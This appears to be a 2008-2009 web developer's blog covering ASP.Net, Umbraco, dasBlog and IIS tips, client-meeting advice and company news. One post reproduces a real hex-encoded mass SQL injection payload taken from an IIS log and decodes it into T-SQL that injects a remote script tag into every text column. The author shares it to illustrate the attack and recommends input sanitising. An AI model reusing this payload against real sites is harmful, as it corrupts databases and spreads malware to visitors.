In the Show commands containing field enter "Tools.ExternalCommand" to list the set of commands, irritatingly it just labels each command as "Tools.ExternalCommand#" for each command so this bit will require a little thinking on your behalf. My commands are #2-6 (#1 is the Dotfuscator Community Edition command).

I would then wire up the following shortcuts (I've set them up Globally for convenience):

Tools.ExternalCommand2 (Current Item): Ctrl+E, I
Tools.ExternalCommand3 (Current Project): Ctrl+E, P
Tools.ExternalCommand4 (Current Solution): Ctrl+E, S
Tools.ExternalCommand5 (Bin dir): Ctrl+E, B
Tools.ExternalCommand6 (Target dir): Ctrl+E, T

To enter these shortcuts simply press the first combination (in this case Ctrl+E), then press the second key (I -item, P -project, S -solution, B -binary, T -target). I found that a couple of these were already wired up to ReSharper and Pex which is a pain but I don't tend to use those particular shortcuts so I just overrode them

Now you should be able to press Ctrl+E followed by I and get your current item in Explorer.

It'd be nice if I could get it to use a single instance of Explorer and just refocus the items (on another key combo as that's not always the desired action).

Update: After using it a little, I've noticed that in my projects, I had the Bin/TargetDir the wrong way around (now corrected).
Monday, March 02, 2009 11:09:25 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, February 27, 2009

If you've been following my blog you'll know that I've been raving about error reporting within ASP.Net (you can see my ASP.Net Error Reporting category for a couple of them if you like) but until now it's been limited to those sites that you have access to the global.asax file.

One of the irritations I've found with Umbraco and dasBlog is that I don't get notified of errors as they're just logged to a text file/database somewhere. This is fine if you run 2 or 3 sites but we manage too many to check them all everyday. Instead we rely on email error notifications which until today have been a PITA to integrate into Umbraco.

Today I'd like to introduce to you Error Handling v2.0 which instead of relying on the global.asax file for the error hooks, uses a HttpModule which means you can install it into any existing/pre-built application such as Umbraco and dasBlog.

Adding it into the site is simple, you'll need to install the module into the web.config file and add the configuration section a sample (cut down) web.config is below:

<?xml version="1.0"?> 
<configuration> 
    <configSections> 
        <section name="tsdErrorsConfigSection" allowExeDefinition="MachineToApplication" restartOnExternalChanges="true" type="System.Configuration.NameValueFileSectionHandler, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /> 
    </configSections> 
 
    <tsdErrorsConfigSection file="ErrorHandling.config"/> 
 
    <system.net> 
        <mailSettings> 
            <smtp from="you@yourdomain.com"> 
                <network host="127.0.0.1" port="25" /> 
            </smtp> 
        </mailSettings> 
    </system.net> 
 
    <system.web> 
        <httpModules> 
            <add name="ErrorModule" type="TheSiteDoctor.ErrorHandling.ErrorModule, TheSiteDoctor.ErrorHandling" /> 
        </httpModules> 
    </system.web> 

<!--  
IIS 7 Settings 
    <system.webServer> 
        <validation validateIntegratedModeConfiguration="false" /> 
        <modules> 
            <add name="ErrorModule" type="TheSiteDoctor.ErrorHandling.ErrorModule, TheSiteDoctor.ErrorHandling" /> 
        </modules> 
    </system.webServer> 
-->
</configuration>

Then you'll need to check all the settings -I recommend storing these in another .config file for clarities sake. Make sure you've configured your SMTP settings and you should be good to go.

If you want to test your settings, I've included a test page for you that will check your settings and show you the defaults if you've not set them. I've got this running now on a couple of Umbraco and dasBlog installs without an issue.

There's also a useful logging system in it which I'll look to overview in a later post but if you want to see it, check out the included aspx file.

Download ErrorHandling_v2.0.zip (25Kb)

If you do use this code I'd be interested to hear how you get on, I think it requires a little more refinement un some areas but it's pretty robust.

Enjoy.

Friday, February 27, 2009 3:51:13 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, February 17, 2009

One of the issues I had with John Forsythe's Recent Comments macro for DasBlog was that the dasBlog recent comments weren't ordered by date (descending). I found that as people commented on older posts they were getting buried which irritated me as many were very still valid comments.

The fix was actually fairly simple, it was just a matter of adding  a sort and thanks to Lamba expressions, this is something we can do fairly simply. If you want to add recent comments to your dasBlog installation, use the following macro:

Recent Comments Macro

public virtual Control RecentComments(int count, int adminComments, int trimTitle, int trimContent, int trimAuthor, bool showTitle, bool showCommentText, bool showCommentCount)
{
    int commentsToShow;
    int totalComments;

    CommentCollection allComments = this.requestPage.DataService.GetAllComments();
    totalComments = allComments.Count;

    //Sort the comments in date order (descending)
    allComments.Sort((c1, c2) => c1.CreatedUtc.CompareTo(c2.CreatedUtc));

    if (!this.requestPage.HideAdminTools && SiteSecurity.IsInRole("admin"))
        commentsToShow = totalComments - adminComments;
    else
        commentsToShow = totalComments - count;

    if (commentsToShow < 0)
        commentsToShow = 0;

    StringBuilder sb = new StringBuilder();

    sb.AppendLine("<div class=\"recentComments\">");

    if (showCommentCount)
        sb.AppendFormat("<div class=\"totalComments\">Total Comments: {0}</div>", totalComments);

    sb.AppendLine("<ul class=\"comments\">");

    #region Loop through the comments

    for (int i = totalComments - 1; i >= commentsToShow; i--)
    {
        Comment current = allComments[i];

        bool showComment;
        if (!current.IsPublic || (current.SpamState == SpamState.Spam))
        {
            if (!this.requestPage.HideAdminTools && SiteSecurity.IsInRole("admin"))
            {
                showComment = true;
            }
            else
            {
                showComment = false;
                if (commentsToShow > 0)
                    commentsToShow--;
            }
        }
        else
        {
            showComment = true;
        }

        if (showComment)
        {
            if ((current.SpamState == SpamState.Spam))
                sb.Append("<li class=\"spam\">");
            else if (!current.IsPublic)
                sb.Append("<li class=\"hidden\">");
            else
                sb.Append("<li>");

            string link = String.Format("{0}{1}{2}", SiteUtilities.GetCommentViewUrl(current.TargetEntryId), "#", current.EntryId);
            string title = current.TargetTitle;
            string desc = current.Content;
            string author = current.Author;

            if (showTitle)
            {
                sb.AppendFormat("<div class=\"recent{0}CommentsTitle\"><a href=\"{1}\">",
                    current.SpamState,
                    link
                    );

                if ((title.Length > trimTitle) && (trimTitle > 0))
                    sb.AppendFormat("RE: {0}...", title.Substring(0, trimTitle));
                else
                    sb.AppendFormat("RE: {0}", title);

                sb.Append("</a></div>");
            }

            if (showCommentText)
            {
                sb.AppendFormat("<div class=\"recentCommentsContent\"><a href=\"{0}\">",
                    link
                    );

                if ((desc.Length > trimContent) && (trimContent > 0))
                {
                    sb.Append(desc.Substring(0, trimContent));
                    sb.Append("...");
                }
                else
                {
                    sb.Append(desc);
                }

                sb.Append("</a></div>");
            }

            sb.Append("<div class=\"recentCommentsAuthor\">");

            if ((author.Length > trimAuthor) && (trimAuthor > 0))
            {
                int num3 = (trimAuthor > author.Length) ? author.Length : trimAuthor;
                sb.Append("by " + author.Substring(0, num3));
                sb.Append("...");
            }
            else
            {
                sb.Append("by " + author);
            }
            sb.Append("</div></li>");
        }
    }
    #endregion

    sb.AppendLine("</ul>");
    sb.AppendLine("</div>");

    return new LiteralControl(sb.ToString());
}

I've since been working on extending it further so you can add a "All Comments" link which I'll post up later as it needs a little more work :)

If you want this wrapped up as a DLL let me know and I'll upload it.

Update 26th Feb 2009: You can download the dll here (it's also got a few other things in there if you want to look around).

Update 27th Feb 2009: I noticed that the above code was messing up everynow and again so I've updated it to use Linq instead which seems to work well. I've updated the DLL but not the source yet.

Tuesday, February 17, 2009 9:25:05 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, January 21, 2009

I thought I'd share this as it's something I've been thinking about trying for a while. Umbraco is great but sometimes you want the default document selected when creating a page to be one that isn't the alphabetically first one.

To work around this I tend to prefix the important Umbraco document types with a symbol (or you could use 1. etc I guess) but if instead you use a space (" ") before the name of your document type, Umbraco will place it at the top of the list for you.

The nice thing to note here is that they obviously trim the name first so it just appears as "Text Page" rather than " Text Page".

I found this out on our latest site which is just about to go live: www.nhshistopathology.net -check it out and let me know what you think.

Enjoy!

Wednesday, January 21, 2009 7:59:39 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [4]  | 
# Sunday, January 18, 2009

This is the second time I've come across the error "Value cannot be null.Parameter name: type" when using ASP.Net Membership Profiles.

Profiles are great, they allow you to store little pieces of information e.g. their user id (an integer reference to your database) on the user against their User object. You can then use that as a property of the User which can get you out of a bind or two.

Since switching to Web Deployment projects to get around a few issues with multiple environment configuration switching however I started to get "Value cannot be null.Parameter name: type". After a little Googling around I found that it relates to the setting "Treat as library component (remove the App_Code.compiled file)" setting under the property pages.

Un-checking the box sorts all your woes :)

Sunday, January 18, 2009 6:49:53 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Friday, November 07, 2008

This came through to one of our clients today, I thought I'd share it as I've not seen it before and it made me chuckle. Note the placeholder: <Online since>

Thought you might like to share it with your clients :)

Friday, November 07, 2008 1:48:20 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, November 05, 2008

We've just moved a couple of our sites onto a new server and have intermittently started to receive the error "The remote host closed the connection. The error code is 0x80072746.", usually around the same time as "Timeout expired.  The timeout period elapsed prior to completion of the operation or the server is not responding.".

As the infrastructure hadn't changed we were able to rule out network issues, hardware issues (it was an upgrade) and nothing had changed on the code level so we put it down to the new backup routine.

On a little Googling, I found a few sites that were pointing to (among other things) the Request length and Executiuon time which got me thinking, in this particular site there is a lot of data being sent/retrieved and it could be maxing out the request. After a little more digging I found this article from Microsoft about the httpRuntime Element and I quote

This time-out applies only if the debug attribute in the compilation element is False. To help to prevent shutting down the application while you are debugging, do not set this time-out to a large value.

Although I didn't recall making any changes to the site, when updating the database configuration settings, I did change the compilation element to false. So far increasing the executionTimeout value appears to have fixed the issue.

Wednesday, November 05, 2008 2:03:40 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Thursday, September 25, 2008

It's important when going into any meeting with a client that you prepare (everyone know's the old motto "Failing to prepare is preparing to fail") but how can you do that? First of all, consider what sort of meeting it is, find out who's going to the meeting and why they're there. Once you have this information you're good to go.

The first client meeting

Although you may be a little nervous at the first couple of meetings, this is perfectly normal, just remember that they've asked you there so they're interested in what you have to say -after all, you're the expert!

It's very likely that they client will want to know more information about your company (not you!) so having a short synopsis of your company that can act as a base is very important. For instance, The Site Doctor has something along the lines of:

The Site Doctor specialises in creating bespoke web based applications centred on your business requirements. We work with some of the world's largest and most successful organisations in both the public and private sectors as well as a wide selection of SME's.

By combining specialist technology skills, with excellence in design, usability, accessibility and a unique business management process, we are able to deliver results-driven solutions including websites, intranets, Content Management Systems, enterprise portals, business applications and extranets.

As well as developing major applications, our skills in marketing and communications ensures that we deliver a consistent message across a number of interactive communication channels and also integrate your objectives within an off-line environment.

Since establishing The Site Doctor, we have encouraged all those involved to participate in the relevant online communities to not only improve their own knowledge and expertise but also give something back and help further other's careers.

To be fair, this monolog changes depending on who we're meeting and the general feeling of the meeting, for instance if you're addressing a panel then we might leave off the SME part and replace it with a list of your clients as they're more likely to be interested in your larger work.

Whatever your monolog is, it should be short and concise (I can digress somewhat sometimes when introducing The Site Doctor), make sure it's no longer than 2 minutes as if they want to know more, they'll ask.

Make sure you've prepared a short list of questions for the client either about themselves or the project they have in mind, some of these you might already have answers to so prepare questions on the responses. Here are a couple of standard ones:

  • What are you looking to achieve with this project -do you have any goals/objectives already defined such as number of visitors, % increase in sales etc?
  • Similar to above, a good question is "What would make you consider this project a success?" -then link it to their targets above
  • Do you have any literature, designs or mood boards that would help with this project already prepared?
  • What are your timescale's for this project?
  • Are there any events or meetings that you would like to have this project completed in time for (99/100 there's a trade show coming up that they forgot to tell you about without being prompted
  • Have you thought about a budget for this work? (They'll most likely say no, you tell us what it'll cost and we'll decide -there's a way around that which I'll blog about later)

If you manage to get this information (and any other relevant information) you're off to a good start with your project! Don't fret too much though if you can't get all the information or you don't manage to get the budget from the client the first time around, there are ways around it.

The most important thing about the first client meeting is that both parties feel at ease with one and other as this will form a good base to build the project on. If you're liked by the client they're more likely to do business with you -especially if they have to pitch you to their superiors.

My next post will blog about the project meetings and client feedback/sign-off meetings. At some point I'll blog about my successful networking tips and how to get a budget out of a client but that's enough for today!

What do you say when in your first meeting? Do you have any tips for what to say in meetings? Leave me a comment, I'd love to hear your thoughts.

Thursday, September 25, 2008 9:34:48 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, July 28, 2008

I've been wondering for a while how Google has managed to find a couple of hidden pages. Although they were securely locked down we noticed a few rejected GoogleBot requests in the audit logs. We put this down to the users having a Google toolbar installed but today we got an error from the new Avant Garde hair salons site that's just gone into beta testing which got me thinking.

This particular link is hidden behind a form post and within a jQuery call (to track an action) so not something the GoogleBot has easy access to. I know they're getting more clever but not *that* clever! We started getting the errors shortly after adding the final Google Analytics code so the only conclusion I can come to is that they're not just registering the URLs for reporting purposes but they're also using them to crawl additional pages.

Does anyone know if they use the URLs tracked in Google Analytics to find new pages? All I can say is if this is the case, you better make sure your "secure" pages check the access permissions on a page level!

Monday, July 28, 2008 2:19:41 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, July 25, 2008

Exactly a year ago today I posted a little application that output the sites in IIS to a text file and as a few days ago Lars asked for the source, I thought it would be a nice thing to release it exactly a year later.

I didn't plan it that way, it just happened! Cool :)

Identify IIS Sites and Log File locations for WWW and FTP source

using System;
using System.DirectoryServices;
using System.IO;
using System.Collections;

namespace IISSites
{
    class Program
    {
        static string fileToWrite = String.Empty;

        [STAThread]
        static void Main(string[] args)
        {
            fileToWrite = String.Format("IISExport{0:dd-MM-yyyy}.txt", DateTime.Today);
            if (args != null && args.Length > 0)
            {
                fileToWrite = args[0];
            }

            SortedList www = new SortedList();
            SortedList ftp = new SortedList();
            try
            {
                const string FtpServerSchema = "IIsFtpServer"; // Case Sensitive
                const string WebServerSchema = "IIsWebServer"; // Case Sensitive
                string ServerName = "LocalHost";
                DirectoryEntry W3SVC = new DirectoryEntry("IIS://" + ServerName + "/w3svc", "Domain/UserCode", "Password");

                foreach (DirectoryEntry Site in W3SVC.Children)
                {
                    if (Site.SchemaClassName == WebServerSchema)
                    {
                        string LogFilePath = System.IO.Path.Combine(
                            Site.Properties["LogFileDirectory"].Value.ToString(),
                            "W3SVC" + Site.Name);
                        www.Add(Site.Properties["ServerComment"].Value.ToString(), LogFilePath);
                    }
                }

                DirectoryEntry MSFTPSVC = new DirectoryEntry("IIS://" + ServerName + "/msftpsvc");
                foreach (DirectoryEntry Site in MSFTPSVC.Children)
                {
                    if (Site.SchemaClassName == FtpServerSchema)
                    {
                        string LogFilePath = System.IO.Path.Combine(
                            Site.Properties["LogFileDirectory"].Value.ToString(),
                            "MSFTPSVC" + Site.Name);
                        ftp.Add(Site.Properties["ServerComment"].Value.ToString(), LogFilePath);
                    }
                }
                int MaxWidth = 0;
                foreach (string Site in www.Keys)
                {
                    if (Site.Length > MaxWidth)
                        MaxWidth = Site.Length;
                }
                foreach (string Site in ftp.Keys)
                {
                    if (Site.Length > MaxWidth)
                        MaxWidth = Site.Length;
                }
                OutputIt("Site Description".PadRight(MaxWidth) + "  Log File Directory");
                OutputIt("".PadRight(79, '='));
                OutputIt(String.Empty);
                OutputIt("WWW Sites");
                OutputIt("=========");
                foreach (string Site in www.Keys)
                {
                    string output = Site.PadRight(MaxWidth) + "  " + www[Site];
                    Console.WriteLine(output);
                    OutputIt(output);
                }
                if (ftp.Keys.Count > 0)
                {
                    OutputIt(String.Empty);
                    OutputIt("FTP Sites");
                    OutputIt("=========");
                    foreach (string Site in ftp.Keys)
                    {
                        string output = Site.PadRight(MaxWidth) + "  " + ftp[Site];
                        OutputIt(output);
                    }
                }
            }
            // Catch any errors
            catch (Exception e)
            {
                Console.WriteLine("Error: " + e.ToString());
            }
            finally
            {
                Console.WriteLine();
                Console.WriteLine("Press enter to close/exit...");
                //Console.Read();
            }
        }

        static void OutputIt(string lineToAdd)
        {
            Console.WriteLine(lineToAdd);

            if (!String.IsNullOrEmpty(fileToWrite))
            {
                StreamWriter SW;
                SW = File.AppendText(fileToWrite);
                SW.WriteLine(lineToAdd);
                SW.Close();
            }
            else
            {
                Console.WriteLine("locationToOutput is Null or String.Empty please supply a value and try again.");
            }
        }
    }
}
Friday, July 25, 2008 3:52:37 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Saturday, July 05, 2008

I've been re-working our new SVN structures recently as I'm now starting to understand how it works but one of the issues I had was trying to move the files/folders from a previous SVN directory.

PowerShell is great if you understand it (which I'm also learning) so I thought I would share this little script with you. It just loops through the files/folders and removes all those named _svn. I found this script from Wyatt Lyon Preul and he complained about the length of the script, but from what I can tell you can condense that down to:

gci $folder -fil '_svn' -r -fo | ? {$_.psIsContainer} | ri -fo -r

I'm not that great with PowerShell yet but I hope that helps someone :)

WARNING: As ever, incase I'm wrong (it happens!) test that on a folder first that you don't worry about losing!
Saturday, July 05, 2008 4:25:32 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, June 25, 2008

As requested on the forum, we've got a map to try and work out where it should be placed, if you want to come along get yourself added: http://tinyurl.com/3oaf8x

Instructions from Google:

Adding and Editing Placemarks

To add a placemark to your map:

  1. Create or open a map.
  2. Click Placemark button. Your cursor changes into a placemark icon with an "X" crosshairs. The crosshairs indicate where the placemark will fall.
    Placemark icon
  3. Move the cursor to the appropriate location. If you want to dismiss this placemark, press the Escape key.
  4. Click your mouse button to place your placemark. It should bounce into place.
  5. Add a title and description.
  6. You can also change the icon for your placemark by clicking the icon in the top right corner of the info window. You can also add your own icon.
  7. Click OK to save your placemark.
To move or edit a placemark:
  1. Click Edit in the left panel.
  2. Drag and drop the appropriate placemark to the new location. Note that you can only edit or move placemarks on your maps, not others.
  3. To edit a placemark's title or description, click on it to open the info window. Edit the title and description and click OK.
  4. Click Done in the left panel when you are finished.
Wednesday, June 25, 2008 10:25:00 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, June 21, 2008

In a previous post about CodeGarden 08, I asked people to get in touch if they'd be interested in a UK Umbraco meet up. I've had a fair few people get in touch so I think it's something worthwhile pursuing further. The nest stage from my POV is working out the location and potential content of the meet so I thought I'd open it up to the floor.

With the forthcoming DDD7, I thought it might be a ready-built platform that we could use but I agree with Phil that DDD7 may not be a suitable platform for a multitude of reasons.

As I've had people from the South West and Scotland voice an interest, I don't think it'll suit the majority of people to have it based in London so suggest it is based in the Midlands -probably Birmingham as it's easy to get to (M6 from the North, M4 from London, M5 from the South -or train!) and there are plenty of places to have the meet.

In regards the format/content of the meet, does anyone have any suggestions? We could follow Niels' and Per's open format or we can have a more structured theme? I've not had too much of a think as to subject matter but some I have come up with so far:

  • An introduction to Umbraco and what it is (many of the people I've spoken to have only just started using Umbraco)
  • Examples of Umbraco how Umbraco can be used
  • More advanced Umbraco functionality (membership etc)
  • Getting to grips with XSLT
  • How to sell Umbraco to your clients

So that's where I've got to so far, does anyone have anything to add?

BTW the logo is just a working logo atm, need to have Niels approve it ;)

Update: I have posted a post on the Umbraco forums about a UK Umbraco meet here

Saturday, June 21, 2008 12:17:58 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [4]  | 
# Thursday, May 29, 2008

Doug Setzer posted this comment in response to my recent "A seriously elegant SQL Injection" post and I thought it may be of interest to others so have promoted it to a post...


Well, I'll step up and say that I am the "mate" who had this done.  Tim's right - *always* sanitize your inputs.  In my defence, this was a site that I inherited from a previous contractor.  I'm not entirely absent of blame, I still should have done a security sweep through the code.

I'd like to document the steps that I went through once this was identified to try and avoid this kind of thing in the future.

  1. Edit every web page that executes a query to sanitize any parameters that are passed in.  Since the site was classic ASP, I used my "SQLStringFieldValue" function:
    www.27seconds.com/kb/article_view.aspx?id=50
  2. Modify the DB user account that is used to have *read only* access to the database
  3. Modify the pages that DO write to the database to have *read/write* access to the specific tables that are being changed.  This limits the number of places that SQL Injection can occur to a smaller set than was previously possible.  I still sanitize all of my input, but I'm extra spastic in these database calls.
  4. Add database auditing (triggers writing to mirror tables with audit event indicator & date/time) to see when data changes occur.  This is still problematic with the pages that have "write" permissions to the tables, but again- that footprint is much smaller.
    My future plans are to move to a view/stored procedure based architecture.  I can then limit write permissions to just the stored procedures and read permissions to just the views.  My grand gusto plans are to move to using command objects & parameters, but I'd sooner re-write the entire site.

Although Doug's attack wasn't the same nihaorr1.com attack that's going around atm it was similar so I would imagine other's will find this useful.

It still amazes me how many developers still fail to sanitise strings, only last week I came across another site (in PHP) that was allowing simple SQL injections to be used to log into their administration system. It was down to a problem with the sanitization string, but why not at least check your site before it goes live? It takes 2 minutes and even less to fix...

For those of you who need a few pointers, there's a good discussion or two about sanitising strings on the 4 Guys From Rolla site.

Thursday, May 29, 2008 3:32:33 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Wednesday, May 28, 2008

Having been subject to a recent hack myself I can sympathise with one of my mates who had a SQL injection attack succeed on one of his sites earlier today. Admitadly mine was due to poor internal maintanence whereas this is almost a piece of art...

This is an extract from the IIS log file:

2008-05-20 21:21:28 W3SVC1 xxx.xxx.xxx.xxx POST /news_detail.asp newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0039006900350074002E0063006E002F0061002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 221.130.180.215 Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0

This works out to:

DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor
CURSOR FOR 
select
    a.name,b.name 
from
    sysobjects a,syscolumns b 
where 
    a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)

    BEGIN
        exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://hackersscriptdomain.cn/a.js></script>''')
        FETCH NEXT FROM  Table_Cursor INTO @T,@C 
    END 
CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Very nice :) (though I can't condone hacking -no matter how elegant it is!)

p.s. The moral of the story is Always sanitise your strings -it's easy!

Wednesday, May 28, 2008 5:46:49 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, April 30, 2008

Despite all the doom and gloom surrounding the pending credit crunch, we're hiring as work is piling in and we need help :). So if you're a developer, designer, sales person, marketing guru -or you're just plain bored check out The Site Doctor's vacancies page for the great posts currently up for grabs!

Not sure why you should come and work with us? There are way too many reasons to list in one go but here are my top 5:

  • You'll have a great boss (ok I'm a touch biased)
  • We have 20% time (every Friday we down tools and do something cool -that doesn't relate to the main projects you're working on at the time -more about that another day)
  • We're committed to your development and will fund courses etc
  • There are bonuses to be had for referrals and working hard!
  • You get your Birthday as an additional bank holiday so you never need to worry about booking it off again!

Oh and there's free Tea and Coffee -so I guess that's 6 reasons to get in touch.

For more information about the posts available (more being added later this week) check out The Site Doctor vacancies page.

Wednesday, April 30, 2008 4:18:00 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, March 10, 2008

Multipack's new logo - based on Birmingham's Bull So Saturday was another chance to meet up with all the Multipack guys in a recently restructured Multipack -same place (The Old Joint Stock in Birmingham), same time (second Saturday of the month). Personally I think it's a good move as the numbers were well up on normal with lots of lovely new Multipackers (I'm no longer the n00bie ;)) from all sorts of interesting backgrounds.

It's great that Multipack is slowly becoming more recognised; at Saturday's meet for example Underscore veteran Darren Beale trekked up from Worcester which was nice as I could finally put a face to the name. Hopefully over the next few months, with a little more self-publication and this easy to remember location/date we'll get more new members.

If you're not sure about coming along just yet, check out the website www.multipack.co.uk and get to know a few of the guys, alternatively there's a mailing list -http://groups.google.com/group/multipack and IRC channel: IRC: irc.freenode.net, 6667, #multipack so plenty of ways to join in.

Monday, March 10, 2008 12:58:05 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Thursday, March 06, 2008

Somewhat behind the original schedule we've finally launched the new company website!

There's still more refining to be done to it and there are a few errors but it's far better than the old site :)

Visit the new The Site Doctor website at www.thesitedoctor.co.uk -new customer quotes and portfolio items coming soon!

We've got some wicked new branding designs to share shortly but until it's all published it's all very hush hush I'm afraid ;)

Thursday, March 06, 2008 3:26:31 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Monday, February 11, 2008

Following on from a recent post of mine about how to setup changeable headers using the media picker in Umbraco a new site I have been working on required something a little extra -they wanted the headers to simply be chosen at random. from a given media folder.

First, create  a new (blank) XSLT file and add the following:

Random header images XSLT

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:Stylesheet [ <!ENTITY nbsp " "> ]>
<xsl:stylesheet 
    version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
    xmlns:msxml="urn:schemas-microsoft-com:xslt"
    xmlns:umbraco.library="urn:umbraco.library"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:math="urn:schemas-hizi-nl:math"
    xmlns:Exslt.ExsltStrings="urn:Exslt.ExsltStrings"
    xmlns:Exslt.ExsltMath="urn:Exslt.ExsltMath"
    exclude-result-prefixes="msxml Exslt.ExsltMath Exslt.ExsltStrings math umbraco.library">

<xsl:output method="xml" omit-xml-declaration="yes"/>

<xsl:param name="currentPage"/>

<msxml:script language="JavaScript" implements-prefix="math">
function random(numDie,numMax,numMin){
if (numMin==null){numMin=1;}
var sum=0;
for (var index=0;index&lt;numDie;index++){ 
sum+=Math.floor(Math.random()*(numMax-numMin) + numMin);
}
return "" + sum;
}
function floorme(numFloor){
return "" + Math.floor(numFloor);
}
</msxml:script>

<xsl:variable name="StartNode" select="/macro/StartNode/node/@id" />
<xsl:variable name="parent" select="umbraco.library:GetMedia($StartNode, 'false')" /> 
<xsl:variable name="random" select="math:random(1, count($parent/node)+1, 1)"/>

<xsl:template match="/">

    <xsl:for-each select="$parent/node">
        <xsl:if test="position()=$random">
            <xsl:if test="./data [@alias = 'umbracoExtension'] = 'gif' or ./data [@alias = 'umbracoExtension'] = 'jpg' or ./data [@alias = 'umbracoExtension'] = 'jpeg' or ./data [@alias = 'umbracoExtension'] = 'png'">
                <style type="text/css">
                #header{
                    background-image: url(<xsl:value-of select="./data [@alias = 'umbracoFile']"/>);
                }
                </style>
            </xsl:if>
        </xsl:if>
    </xsl:for-each>
</xsl:template>

</xsl:stylesheet>

What this does is it uses the StartNode (a media folder) passed in from the macro to loop through any valid files (in this case jpg/gif/png and pull out the image if it's valid. I was thinking about replacing the for-each loop and simply using the index but I'm not sure if there would be any performance improvement except for if there were a lot of header images in the folder.

You'll then need to create a new macro and add a parameter with the name "StartNode" and select "mediaCurrent" as the Type. That's it :)

I'd like to build on this and have a "valid" headers selector which would use a Multiple Media picker and would allow for banner ads to be selected at random but that can wait for a client that needs it ;)
Monday, February 11, 2008 3:40:52 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [8]  | 
# Friday, January 18, 2008


For those of you Microsoft readers I thought I'd let you know I've just had an email come through about Visual Studio's UK Launch. It's happening on March 19th 2008 in Birmingham's ICC. Registration has finally opened and you can register here: http://go.microsoft.com/?linkid=8126604

Alternatively check out the live cast at: www.heroeshappenhere.co.uk.

Why am I excited about this? Well the last launch event I went to gave away free -and full- copies of Microsoft Visual Studio 2005 and SQL Server 2005 to every delegate! Hope to see you there -let me know if you can make it.

Friday, January 18, 2008 12:13:38 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, January 16, 2008

After our recent issues with Fasthosts (or as they are now fondly referred to in the office - Farcehosts) I have made the conscious decision to move away from them completely over the forthcoming months (probably years). We no longer have any clients on their hosting platform but we still have circa 300 domain names registered through various accounts through their sister company UKReg.

Due to the authority's charges, we can't just transfer all these domains away as it'd cost us a fortune (and possibly one we can't recoup) so I'm going to do it as they expire. In our search to find an alternative provider someone suggested we check out the new kid on the block - Heart Internet. According to those in the know on Underscore they are a bunch of guys who used to work at 1&1 and decided they could do it better.

So far I've found their service to be great -and value wise they're cheaper than most providers which is a bonus. As with most of the providers these days it's all managed through their easy to use online control panel which is pretty straight forward. If you're on the lookout for great value or cheap domain names give Heart Internet a look.

BTW if you're wondering where Heart Internet's .co.uk domain names from 9p is, check under the transfer fees. Still £2.59 is a great price for any .co.uk!

